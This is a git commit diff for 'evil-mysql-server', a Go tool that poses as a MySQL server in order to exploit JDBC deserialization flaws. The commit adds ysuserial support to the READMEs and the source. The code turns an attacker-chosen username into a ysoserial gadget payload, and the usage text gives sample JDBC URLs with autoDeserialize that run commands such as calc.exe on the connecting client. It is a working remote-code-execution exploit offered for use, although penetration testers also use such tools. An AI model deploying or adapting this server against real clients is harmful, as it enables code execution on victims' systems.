support ysuserial, fixed #1

Author: dushixiang

README-zh_CN.md

@@ -4,22 +4,36 @@
 
 ## 简介
 
-**evil-mysql-server** 是一个针对 jdbc 反序列化漏洞编写的恶意数据库，依赖 [ysoserial](https://github.com/frohoff/ysoserial) 。
+**evil-mysql-server** 是一个针对 jdbc 反序列化漏洞编写的恶意数据库，依赖 ysoserial 。
 
 使用方式
 
+[ysoserial](https://github.com/frohoff/ysoserial)
+
 ```shell
 ./evil-mysql-server -addr 3306 -java java -ysoserial ysoserial-0.0.6-SNAPSHOT-all.jar
 ```
 
+启动成功后，使用 jdbc 进行连接，其中用户名称格式为 `yso_payload_command` , 连接成功后 `evil-mysql-server` 会解析用户名称，并使用如以下命令生成恶意数据返回到 jdbc 客户端。
+```shell
+java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections1 calc.exe
+```
+
+[ysuserial](https://github.com/su18/ysoserial) 这是一个基于原始ysoserial的增强项目。
+
+```shell
+./evil-mysql-server -addr 3306 -java java -ysuserial ysuserial-0.9-su18-all.jar
+```
 
 启动成功后，使用 jdbc 进行连接，其中用户名称格式为 `yso_payload_command` , 连接成功后 `evil-mysql-server` 会解析用户名称，并使用如以下命令生成恶意数据返回到 jdbc 客户端。
 ```shell
-java -jar ysoserial.jar CommonsCollections1 calc.exe
+java -jar ysuserial-0.9-su18-all.jar -g CommonsCollections1 -p calc.exe
 ```
 
 ## JDBC url 示例
 
+> 使用 ysuserial 时请修改username的前三个字符为 **ysu** 
+
 **5.1.11-5.x**
 ```shell
 jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections1_calc.exe

README.MD

@@ -8,14 +8,28 @@ English | [简体中文](./README-zh_CN.md)
 
 Usage
 
+[ysoserial](https://github.com/frohoff/ysoserial)
+
 ```shell
 ./evil-mysql-server -addr 3306 -java java -ysoserial ysoserial-0.0.6-SNAPSHOT-all.jar
 ```
 
 After successful startup use jdbc to connect, where the username format is `yso_payload_command`, after successful connection **evil-mysql-server** will parse the username and generate malicious data back to the jdbc client using the following command.
 
 ```shell
-java -jar ysoserial.jar CommonsCollections1 calc.exe
+java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections1 calc.exe
+```
+
+[ysuserial](https://github.com/su18/ysoserial) It's an enhanced project based on original ysoserial.
+
+```shell
+./evil-mysql-server -addr 3306 -java java -ysuserial ysuserial-0.9-su18-all.jar
+```
+
+After successful startup use jdbc to connect, where the username format is `ysu_payload_command`, after successful connection **evil-mysql-server** will parse the username and generate malicious data back to the jdbc client using the following command.
+
+```shell
+java -jar ysuserial-0.9-su18-all.jar -g CommonsCollections1 -p calc.exe
 ```
 
 ## JDBC url examples

evil-mysql-server.go

@@ -19,6 +19,7 @@ const Version = "v0.0.1"
 var addr = flag.String("addr", "0.0.0.0:3306", "listen addr")
 var javaBinPath = flag.String("java", "java", "java bin path")
 var ysoserialPath = flag.String("ysoserial", "ysoserial-0.0.6-SNAPSHOT-all.jar", "ysoserial bin path")
+var ysuserialPath = flag.String("ysuserial", "ysuserial-0.9-su18-all.jar", "ysuserial bin path")
 
 func init() {
 	flag.Parse()
@@ -200,7 +201,9 @@ func handleAccept(conn net.Conn) {
 		if requestQuery.Command == 3 {
 			log.Printf("[-] request query statement: %s\n", requestQuery.Statement)
 			if strings.Contains(requestQuery.Statement, "SHOW SESSION STATUS") {
-				if !strings.HasPrefix(username, "yso") {
+				useYso := strings.HasPrefix(username, "yso")
+				useYsu := strings.HasPrefix(username, "ysu")
+				if !useYso && !useYsu {
 					return
 				}
 				params := strings.Split(username, "_")
@@ -211,7 +214,14 @@ func handleAccept(conn net.Conn) {
 				payload := params[1]
 				command := params[2]
 
-				cmd := exec.Command(*javaBinPath, "-jar", *ysoserialPath, payload, command)
+				var cmd *exec.Cmd
+				if useYso {
+					cmd = exec.Command(*javaBinPath, "-jar", *ysoserialPath, payload, command)
+				} else if useYsu {
+					cmd = exec.Command(*javaBinPath, "-jar", *ysuserialPath, "-g", payload, "-p", command)
+				}
+
+				log.Printf("[-] exec: %s\n", cmd.String())
 				poc, err := cmd.CombinedOutput()
 				if err != nil {
 					log.Printf("[x] gen ysoserial poc error : %s\n", err.Error())